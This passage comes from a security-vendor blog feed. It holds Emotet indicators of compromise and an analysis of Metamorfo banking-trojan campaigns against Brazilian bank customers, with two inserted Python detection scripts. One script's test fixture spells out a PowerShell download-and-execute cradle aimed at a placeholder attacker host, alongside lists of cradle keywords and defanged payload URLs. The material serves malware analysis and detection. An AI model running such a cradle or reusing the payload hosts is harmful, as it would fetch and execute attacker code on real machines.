href="https://3.bp.blogspot.com/-vqmu1IK2bXA/W-W3KCQMKvI/AAAAAAAABJQ/rYkGZHBtDWsQZoTu_4NC1YDTYmu8ZKPmACLcBGAs/s1600/6741cd93e13b4ed0283aadd39e53e496f41fe8cc51116679a8bb6d5d49e3fda0_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-vqmu1IK2bXA/W-W3KCQMKvI/AAAAAAAABJQ/rYkGZHBtDWsQZoTu_4NC1YDTYmu8ZKPmACLcBGAs/s640/6741cd93e13b4ed0283aadd39e53e496f41fe8cc51116679a8bb6d5d49e3fda0_tg.png" width="640" /></a></div><b><br /></b><b><br /></b> <br /><h3>Doc.Downloader.Emotet-6744157-1</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Type</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Start</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ErrorControl</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ImagePath</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: DisplayName</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: WOW64</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ObjectName</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\dimcloud </li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Description</li></ul></li></ul><b>Mutexes</b><br /><ul><li>Global\I98B68E3C</li><li>Global\M98B68E3C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>182[.]180[.]77[.]215</li><li>45[.]59[.]204[.]133</li><li>67[.]177[.]71[.]77</li><li>87[.]229[.]45[.]35</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>lionhomesystem[.]hu</li></ul><b>Files and or directories created</b><br /><ul><li>%AppData%\Microsoft\UProof\CUSTOM.DIC</li><li>%SystemDrive%\TEMP\~$18_11Informationen_betreffend_Transaktion.doc</li><li>%SystemDrive%\~$9441806.doc</li><li>%LocalAppData%\Temp\781.exe</li><li>%LocalAppData%\Temp\mq0dgaud.vrd.psm1</li><li>%LocalAppData%\Temp\xxlgesic.vav.ps1</li><li>%WinDir%\SysWOW64\dimcloudb.exe</li><li>%WinDir%\TEMP\9E64.tmp</li><li>%LocalAppData%\Temp\CVRF911.tmp</li></ul><b>File Hashes</b><br /><ul><li>14e4a394fa5994ce2ff8047f2bac46b385a5a6510205e4c65930c0af413c935e</li><li>500a319207a744b8d20c4bccb1c0b5b4f2fafc228cf05dd6bd2cb19b02444f58</li><li>53402a103a73ae604657be6e171cc017957fa1f3638fcbe976ca3af694ba0b7f</li><li>6bc0481d7b339a55f6493bfba40bca7819a3799a39b5beaf09490aafed45bc24</li><li>82448e012786f528fb7946640e84c6beadf34de21130a69bdc1538d4cc8cddf2</li><li>8d74c083778f9511c01916d183301686ac09a7011bbfa8f744a5816dc244340a</li><li>94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d</li><li>a2d01ed549ffcdd8de59939e7fae64d1455309ab7b8cbbaa6aae8f626803319b</li><li>a692ae61c540f3138866e74cd98aab9b368fdfe36233ccc408549a69a5a2c86f</li><li>dca6675566e48fbab773ad8c64504b809f8323ca48a8771d0a80ad7ccea1a2de</li><li>eb6b88afe59ff4fe3068586f6eea31a174deb0956f9fc72df68394bb007aee05</li><li>ec383b84e5038f061921a2a41b27d8635465826bce5636b21ede0fe061895972</li><li>f3641ae9463763cac44325547c7a6aeb954e8cc09a4ddf739c8d068c443761c9</li><li>f49cfd859d0cde4b95fbb1cd277a2e0668ac8bdbbc5e215af7da159e108ac5cd</li><li>f99dd238a630895697be11c2a551a3874a315b6f5a7bf752ab06cab6eb69e7b9</li><li>ffe52a1f56588e88eef218987e89a4caade5125e3a4478cb38ce85ec7733e03c</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; 
margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Z2ZWzmCaY-8/W-W4-pS_XwI/AAAAAAAABJg/mplZYg1ZR74LhbwMj065VZ2BrrSwVbxJwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-Z2ZWzmCaY-8/W-W4-pS_XwI/AAAAAAAABJg/mplZYg1ZR74LhbwMj065VZ2BrrSwVbxJwCLcBGAs/s400/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-3Gp1-XOLuXw/W-W5DVPS6aI/AAAAAAAABJs/8N73E4D5fEMx8aibHglvg_uuXj57jMQiwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-3Gp1-XOLuXw/W-W5DVPS6aI/AAAAAAAABJs/8N73E4D5fEMx8aibHglvg_uuXj57jMQiwCLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-fvUFekhQfXs/W-W5HyOsr2I/AAAAAAAABJw/YI_3QoKKd4scWMzFaML6Af-S4IS9_e4bwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" 
src="https://2.bp.blogspot.com/-fvUFekhQfXs/W-W5HyOsr2I/AAAAAAAABJw/YI_3QoKKd4scWMzFaML6Af-S4IS9_e4bwCLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-lgX6rTIdKtc/W-W5Mp7eOCI/AAAAAAAABJ0/c6PD8QcjXZAe-EggZrNaVq2T1jrTkpe2ACLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-lgX6rTIdKtc/W-W5Mp7eOCI/AAAAAAAABJ0/c6PD8QcjXZAe-EggZrNaVq2T1jrTkpe2ACLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_malware.png" width="640" /></a></div><b><br /></b><b><br /></b>2018-12-13T14:22:56.315-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1102-1109.htmlMetamorfo Banking Trojan Keeps Its Sights on Brazilhttp://feedproxy.google.com/~r/feedburner/Talos/~3/IryTCv_UMlU/metamorfo-brazilian-campaigns.htmlbanking trojanBrazildelphiMalware AnalysisMalware ResearchPowershelltrojannoreply@blogger.com (Paul Rascagneres)Thu, 08 Nov 2018 09:09:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-2971444325100835792<div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post was authored by <a href="https://www.blogger.com/profile/10442669663667294759">Edmund Brumaghin</a>, <a href="https://twitter.com/securitybeard">Warren Mercer</a>, <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>, and <a href="https://twitter.com/_vventura">Vitor Ventura</a>.</i><br /><br /><h2 id="h.ijn5vmrwa5i0">Executive Summary</h2><br />Financially motivated cybercriminals have used banking trojans for years to steal sensitive 
financial information from victims. They are often created to gather credit card information and login credentials for various online banking and financial services websites so this data can be monetized by the attackers. Cisco Talos recently identified two ongoing malware distribution campaigns being used to infect victims with banking trojans, specifically financial institutions' customers in Brazil. Additionally, during the analysis of these campaigns, Talos identified a dedicated spam botnet that is currently delivering malicious spam emails as part of the infection process.<br /><br /><h2 id="h.nmh42lcrtlu9">Distribution campaigns</h2><br />While analyzing these campaigns, Talos identified two separate infection processes that we believe attackers have used between late October and early November. These campaigns used different file types for the initial download and infection process, and ultimately delivered two separate banking trojans that target Brazilian financial institutions. Both campaigns used the same naming convention for various files used during the infection process and featured the abuse of link-shortening services to obscure the actual distribution servers used. The use of link shorteners also allows some additional flexibility. Many organizations allow their employees to access link shorteners from corporate environments, which could enable the attacker to shift where they are hosting malicious files, while also enabling them to leverage these legitimate services in email-based campaigns.<br /><br /><a name='more'></a><br /><h2 id="h.im8roqhq3l0d">Campaign 1</h2><br />Talos identified a spam campaign using a zipped file hosted on a free web hosting platform. This archive contains a Windows LNK file (Link). 
During this campaign, the archive filename used the following format:<br /><br />"Fatura-XXXXXXXXXX.zip," where "XXXXXXXXXX" is a 10-digit numeric value.<br /><br />The LNK filename followed this format:<br /><br />"__Fatura pendente - XXXX.lnk," where "XXXX" is a four-digit alphanumeric value.<br /><br />The purpose of the LNK file was to download a PowerShell script with an image filename extension (.bmp or .png):<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-8P58hfZMuxM/W-GaqPPYFBI/AAAAAAAAAi0/vL1xz9Ea6P0ElzEcBIVISegmG5IgUVw8ACLcBGAs/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="1600" height="216" src="https://3.bp.blogspot.com/-8P58hfZMuxM/W-GaqPPYFBI/AAAAAAAAAi0/vL1xz9Ea6P0ElzEcBIVISegmG5IgUVw8ACLcBGAs/s640/image16.png" width="640" /></a></div><br />This command downloads a second PowerShell script from the attacker's URL and executes it. That script is also obfuscated:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-fUL8ld9S4dE/W-GauuBqOkI/AAAAAAAAAi4/CSa1uCY50j0O6x6UpEYJT2Ch6QV046QgwCLcBGAs/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="742" data-original-width="1589" height="298" src="https://2.bp.blogspot.com/-fUL8ld9S4dE/W-GauuBqOkI/AAAAAAAAAi4/CSa1uCY50j0O6x6UpEYJT2Ch6QV046QgwCLcBGAs/s640/image13.png" width="640" /></a></div><br />This script is used to download an archive hosted on Amazon Web Services (AWS):<br /><br />hxxps://s3-eu-west-1[.]amazonaws[.]com/killino2/image2.png<br /><br />This archive contains two files:<br /><br /><ul><li>A dynamic library (.DLL)</li><li>A compressed payload (.PRX)</li></ul><br />The library decompresses the PRX file and executes it in a remote process (library injection). 
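<br /><br />As an added illustration of the stage-1 downloader (example code written for this edit, not Talos's tooling or the actor's code), the Python script below parses the Shell Link (.lnk) binary format far enough to recover a shortcut's target, working directory and command-line arguments, then applies simple download-cradle heuristics: a script host as target, download/IEX markers in the arguments, a hidden or minimised window, and a borrowed icon. The constructed sample LNK stands in for "__Fatura pendente - XXXX.lnk"; the hostname attacker.example and the exact PowerShell command line are assumptions, since the post shows the real command only as a screenshot.<br /><br />

```python
"""Parse a Windows .lnk (Shell Link) file and flag PowerShell download cradles.

Added example for the Campaign 1 stage-1 downloader: the shortcut's command
line is what fetches the PowerShell script disguised as an image file.
"""
import re
import struct

# Shell Link header constants (MS-SHLLINK). The CLSID is stored little-endian.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_DATA = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "iex", "invoke-expression", "-enc", "frombase64string",
                  "net.webclient", "http")


def parse_lnk(data: bytes) -> dict:
    """Return header fields and StringData strings from a .lnk blob."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize includes the size field itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_DATA:
        if not flags & bit:
            info[name] = ""
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        size = count * 2 if unicode else count
        info[name] = data[off:off + size].decode("utf-16-le" if unicode else "cp1252", "replace")
        off += size
    return info


def assess_lnk(data: bytes) -> dict:
    """Apply download-cradle heuristics to a parsed .lnk; returns fields plus verdict."""
    info = parse_lnk(data)
    target = (info["relative_path"] + " " + info["working_dir"]).lower()
    args = info["arguments"].lower()
    reasons = []
    if any(h in target for h in SCRIPT_HOSTS):
        reasons.append("target is a script host or LOLBin")
    hits = [m for m in CRADLE_MARKERS if m in args]
    if hits:
        reasons.append("download cradle markers in arguments: " + ", ".join(hits))
    if re.search(r"-w(?:indowstyle)?\s+hidden", args) or info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window hidden or minimised")
    if info["icon_location"] and any(h in target for h in SCRIPT_HOSTS):
        reasons.append("custom icon on a script-host shortcut (possible document icon spoofing)")
    info["reasons"] = reasons
    info["suspicious"] = len(reasons) >= 2  # assumed threshold, tune per environment
    return info


def build_lnk(relative_path: str, working_dir: str = "", arguments: str = "",
              icon_location: str = "", show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk; used here only to make test input."""
    flags = HAS_LINK_TARGET_ID_LIST | IS_UNICODE
    strings = []
    for bit, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir),
                       (HAS_ARGUMENTS, arguments), (HAS_ICON_LOCATION, icon_location)):
        if value:
            flags |= bit
            strings.append(struct.pack("<H", len(value)) + value.encode("utf-16-le"))
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # empty IDList: just the TerminalID
    return header + id_list + b"".join(strings) + b"\x00\x00\x00\x00"  # ExtraData terminal block


# Constructed stand-in for "__Fatura pendente - XXXX.lnk": a PowerShell cradle
# fetching a script served with a .bmp extension. attacker.example is a
# placeholder; the real stage-2 URL is listed in the IOC section of the post.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments="-NoP -W Hidden -Ep Bypass -C \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://attacker.example/downs/imagemFr.bmp')\"",
    icon_location=r"%SystemRoot%\System32\imageres.dll",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path=r"..\..\Windows\notepad.exe",
                       working_dir=r"C:\Users\victim\Documents")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        verdict = assess_lnk(blob)
        print(label, verdict["suspicious"], verdict["reasons"])
```

Run the file directly to print a verdict for the constructed sample and for a benign Notepad shortcut. The parser skips the optional LinkTargetIDList and LinkInfo blocks and stops after StringData; ExtraData blocks, which real samples often carry, are ignored because the command line lives in StringData.<br /><br />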
The injected PRX code is the final payload, described later in this post.<br /><h2 id="h.az9x8x4ab5sz">Campaign 2</h2><br />In addition to the infection process described in Campaign 1, Talos also observed a second series of campaigns that leveraged a different process to deliver and execute malware on victim systems. This campaign also appeared to target Portuguese-speaking victims.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GPjkFzAIGVk/W-Ga6ezRYaI/AAAAAAAAAjA/tz8cHeB9p2MLCdYTBFHgORkR_MjahbDfQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="1201" height="416" src="https://1.bp.blogspot.com/-GPjkFzAIGVk/W-Ga6ezRYaI/AAAAAAAAAjA/tz8cHeB9p2MLCdYTBFHgORkR_MjahbDfQCLcBGAs/s640/image3.png" width="640" /></a></div><br />In this series of campaigns, attackers leveraged malicious PE32 executables to perform the initial stage of the infection process rather than Windows shortcut files (LNK). These PE32 executables were delivered in ZIP archives using the following naming convention:<br /><br />"Fatura-XXXXXXXXXX.zip," where "XXXXXXXXXX" is a 10-digit numeric value.<br /><br />The ZIP archive contains a PE32 executable. 
These executables used the following naming convention:<br /><br />"__Fatura pendente - XXXX.exe," where "XXXX" is a four-digit alphanumeric value.<br /><br />When executed, these PE32 files are used to create a batch file in a subdirectory of %TEMP%.<br /><br />The Windows Command Processor is then used to execute the batch file which, in turn, executes PowerShell with the instructions to download the contents hosted on the attacker-controlled server and pass it to the Invoke-Expression (IEX) using the following syntax:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--C_yq0gmakM/W-GbA73bx7I/AAAAAAAAAjE/KQ6Xkm6TnKwjmcWLQd92uF_liNqUHYNbgCLcBGAs/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="100" data-original-width="1600" height="38" src="https://1.bp.blogspot.com/--C_yq0gmakM/W-GbA73bx7I/AAAAAAAAAjE/KQ6Xkm6TnKwjmcWLQd92uF_liNqUHYNbgCLcBGAs/s640/image15.png" width="640" /></a></div><br />The batch file is then deleted and the infection process continues.<br /><br />When the system reaches out to Bitly, the link shortener, to access the contents hosted at the shortened link destination, an HTTP redirection redirects the client to the attacker-controlled server hosting a PowerShell script that is passed into IEX and executed as previously described. 
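<br /><br />Two evasion tricks described later in this section are easy to catch with static checks: the payload is requested as a JPEG but is really a ZIP archive, and the DLL inside is inflated with null bytes. The following Python example, added for this edit and not part of the original post, compares the HTTP Content-Type header with the body's magic bytes, extracts any ZIP members and measures their 0x00 padding (null ratio, longest run and entropy). The HTTP response it inspects is constructed in the script (a fake b.dll of roughly 2 MiB served as image/jpeg); the thresholds of 75 percent nulls or a 1 MiB null run are assumptions, not figures from the post.<br /><br />

```python
"""Inspect what a Campaign 2 stage fetches: declared Content-Type versus real
magic bytes, then null-byte padding of the DLL inside the archive.

Added example, not code from the original post. The sample response is
constructed: a ZIP holding a fake 'b.dll' padded with 2 MiB of 0x00, served
as image/jpeg, mirroring the tricks described for this campaign.
"""
import io
import math
import re
import zipfile
from collections import Counter

# Magic-byte prefixes for the content types that matter in this chain.
MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF8", "image/gif"),
    (b"BM", "image/bmp"),
    (b"PK\x03\x04", "application/zip"),
    (b"MZ", "application/x-msdownload"),
)

# Assumed thresholds for calling a binary "inflated"; tune for your pipeline.
NULL_RATIO_LIMIT = 0.75
NULL_RUN_LIMIT = 1024 * 1024


def sniff_type(body: bytes) -> str:
    """Identify a body by its leading bytes, ignoring what the server claimed."""
    for magic, mime in MAGIC:
        if body.startswith(magic):
            return mime
    return "application/octet-stream"


def content_type_mismatch(declared: str, body: bytes) -> dict:
    """Compare the HTTP Content-Type header with what the bytes actually are."""
    declared = declared.split(";")[0].strip().lower()
    actual = sniff_type(body)
    return {"declared": declared, "actual": actual,
            "mismatch": actual != "application/octet-stream" and actual != declared}


def padding_profile(blob: bytes) -> dict:
    """Measure how much of a file is 0x00 filler (the inflated-binary evasion)."""
    if not blob:
        return {"size": 0, "null_ratio": 0.0, "longest_null_run": 0,
                "entropy": 0.0, "inflated": False}
    nulls = blob.count(0)
    longest = max((m.end() - m.start() for m in re.finditer(rb"\x00+", blob)), default=0)
    counts = Counter(blob)
    entropy = -sum(c / len(blob) * math.log2(c / len(blob)) for c in counts.values())
    ratio = nulls / len(blob)
    return {"size": len(blob), "null_ratio": ratio, "longest_null_run": longest,
            "entropy": entropy,
            "inflated": ratio > NULL_RATIO_LIMIT or longest > NULL_RUN_LIMIT}


def analyze_download(declared_type: str, body: bytes) -> dict:
    """Run both checks over an HTTP response body, as a proxy or sandbox would."""
    report = {"content": content_type_mismatch(declared_type, body), "members": {}}
    if report["content"]["actual"] == "application/zip":
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            for name in zf.namelist():
                member = zf.read(name)  # decompressing is where the 366MB shows up
                profile = padding_profile(member)
                profile["pe"] = member.startswith(b"MZ")
                report["members"][name] = profile
    report["suspicious"] = report["content"]["mismatch"] or any(
        m["pe"] and m["inflated"] for m in report["members"].values())
    return report


def build_sample_response() -> bytes:
    """Constructed: ZIP with a fake b.dll (MZ header, 204000 non-null bytes, 2 MiB of nulls)."""
    fake_dll = b"MZ" + bytes(range(1, 256)) * 800 + b"\x00" * (2 * 1024 * 1024)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("b.dll", fake_dll)
    return buf.getvalue()


SAMPLE_DECLARED_TYPE = "image/jpeg"  # what the server claimed in the campaign
SAMPLE_BODY = build_sample_response()

if __name__ == "__main__":
    result = analyze_download(SAMPLE_DECLARED_TYPE, SAMPLE_BODY)
    print("compressed size:", len(SAMPLE_BODY), "bytes")
    print(result["content"])
    for name, profile in result["members"].items():
        print(name, {k: round(v, 3) if isinstance(v, float) else v for k, v in profile.items()})
    print("suspicious:", result["suspicious"])
```

On a real sample the same profile explains why the roughly 366MB DLL looks the way it does: the compressed archive stays small enough to download quickly, while the decompressed file exceeds what most sandboxes accept. A pipeline that keys on the longest null run, or trims the padding before hashing and detonation, can still process such files.<br /><br />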
The server delivers the following PowerShell:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-w4-BHHUXvr8/W-GbIIRZuCI/AAAAAAAAAjI/AgzAV2NKUlYTrE4ZO9LRFITpWBGOwlYPACLcBGAs/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="556" data-original-width="1600" height="222" src="https://3.bp.blogspot.com/-w4-BHHUXvr8/W-GbIIRZuCI/AAAAAAAAAjI/AgzAV2NKUlYTrE4ZO9LRFITpWBGOwlYPACLcBGAs/s640/image14.png" width="640" /></a></div><br />This PowerShell script retrieves and executes the malicious payload delivered to the system. It also leverages the Bitly service, as seen in the previous screenshot.<br /><br />Appending a "+" to a Bitly short URL displays the link's public statistics. Doing so showed that the link was created on Oct. 21, most likely around the campaign start, and that Bitly had registered 699 clicks on it so far.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-2xDyej0Nb3c/W-GbOU9BALI/AAAAAAAAAjM/VPpplydNVFU_2BhrYRLlWo9TDz8NRnYagCLcBGAs/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1600" height="234" src="https://4.bp.blogspot.com/-2xDyej0Nb3c/W-GbOU9BALI/AAAAAAAAAjM/VPpplydNVFU_2BhrYRLlWo9TDz8NRnYagCLcBGAs/s640/image12.png" width="640" /></a></div><br />Although the HTTP request asks for a JPEG and the response's Content-Type header says "image/jpeg," the server actually delivers a ZIP archive containing a Windows DLL named "b.dll."<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-1qNQOMNlTwQ/W-GbhB4t3qI/AAAAAAAAAjk/cGfOE1Vr6wEPEj3I6YVsmDqX8yW_75iEgCLcBGAs/s1600/image10.png" imageanchor="1" 
style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="701" data-original-width="1600" height="280" src="https://3.bp.blogspot.com/-1qNQOMNlTwQ/W-GbhB4t3qI/AAAAAAAAAjk/cGfOE1Vr6wEPEj3I6YVsmDqX8yW_75iEgCLcBGAs/s640/image10.png" width="640" /></a></div><br />The script then sleeps for 10 seconds, after which it extracts the archive and saves the DLL to a subdirectory of %APPDATA% on the system. RunDLL32 is then used to execute the DLL, infecting the system. The uncompressed DLL is very large, approximately 366MB, because the binary is padded with a large number of 0x00 (null) bytes. This is likely intended to evade automated detection and analysis systems, many of which do not properly process files of this size; for the same reason it avoids sandbox detonation, as most sandboxes will not accept such large files.<br /><br />Additionally, infected systems beacon to an attacker-controlled server (srv99[.]tk) during the infection process.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-qjpA_EI7us4/W-Gbm3ZZI9I/AAAAAAAAAjs/DtWxVp_7byIwtboTQLBbgRuHZMNg5ZQYQCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="1370" height="270" src="https://3.bp.blogspot.com/-qjpA_EI7us4/W-Gbm3ZZI9I/AAAAAAAAAjs/DtWxVp_7byIwtboTQLBbgRuHZMNg5ZQYQCLcBGAs/s640/image6.png" width="640" /></a></div><br />Analysis of DNS traffic for this domain shows an increase in resolution attempts that corresponds with the observed campaigns.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-cCxhbXCA2dE/W-GbquI2qpI/AAAAAAAAAjw/RfV22GsWDFQMs0N38ve20qu1obxBy5NDQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img 
border="0" data-original-height="227" data-original-width="1329" height="108" src="https://2.bp.blogspot.com/-cCxhbXCA2dE/W-GbquI2qpI/AAAAAAAAAjw/RfV22GsWDFQMs0N38ve20qu1obxBy5NDQCLcBGAs/s640/image7.png" width="640" /></a></div><br />The majority of these resolution requests came from systems located in Brazil.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PW4W6cY6Pcw/W-GbuE9Mo3I/AAAAAAAAAj4/-DNyCHb9NPQuVcawUos1DgP1eKo944W6ACLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="508" data-original-width="1306" height="248" src="https://1.bp.blogspot.com/-PW4W6cY6Pcw/W-GbuE9Mo3I/AAAAAAAAAj4/-DNyCHb9NPQuVcawUos1DgP1eKo944W6ACLcBGAs/s640/image2.png" width="640" /></a></div><br />The PowerShell script also communicates with a host on a dynamic DNS service (the C2 domain listed in the IOCs below). As with the first Bitly link, we were able to obtain additional information about the second Bitly link associated with this domain:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-OSvUu-FwVi0/W-Gb0-7yNaI/AAAAAAAAAkA/nb77ln08HqUujgpIBeK3TQaBPseZR9OBQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="566" data-original-width="1600" height="226" src="https://1.bp.blogspot.com/-OSvUu-FwVi0/W-Gb0-7yNaI/AAAAAAAAAkA/nb77ln08HqUujgpIBeK3TQaBPseZR9OBQCLcBGAs/s640/image9.png" width="640" /></a></div><br />We once again see a creation time, this one a few days later, which may indicate the actor pivoting to a different email list to send the same spam content to.<br /><br /><h2 id="h.99dbqpunjs2u">Spam tools</h2><br />Both of these campaigns eventually deliver a banking trojan. However, Talos identified additional tools and malware hosted on the Amazon S3 bucket. 
